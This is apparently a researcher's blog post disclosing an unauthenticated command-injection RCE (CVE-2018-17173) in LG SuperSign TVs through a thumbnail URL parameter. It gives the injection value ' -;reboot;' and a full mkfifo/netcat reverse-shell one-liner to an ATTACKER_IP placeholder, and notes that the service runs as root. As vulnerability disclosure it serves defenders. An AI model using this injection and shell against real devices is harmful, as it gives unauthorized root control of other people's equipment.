Publishing the previous vulnerabilities in LG SuperSign TVs left a bad taste in my mouth. Something like "I know that there must be something more". So, I continued with my research and finally found the precious RCE.
This vulnerability has been addressed with the following CVE: CVE-2018-17173.
Playing with the app through Burp I saw a URL with some parameters. This URL is requested when the application needs to load the thumbnails of the images the user has uploaded.
The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the value "' or 1 --'". It looked like it was triggering a command that was calling this utility but failing due to an unexpected parameter. Cleaning the input a little bit, I found that the value ' - was enough to receive this response. I knew I was close.
If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc. After some failed attempts I tried ' -;reboot;' and I saw how the TV was rebooting... the RCE was knocking on my door.
Getting a Shell
Taking advantage of the LFI, I knew that the TV had netcat, but it was the netcat version that doesn't support the -e option (downloading the binary), so I used the alternative:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
Everything URL-encoded so it could be passed in the URL.
So, the payload was ready:
Putting it all together:
I launched netcat to catch the shell, made the request and...
I was in.
In a few days I'll be updating this post with more technical details.
That is all for now.
Points to take into account:
-No need to be authenticated
-No need for privilege escalation (the app is running as root)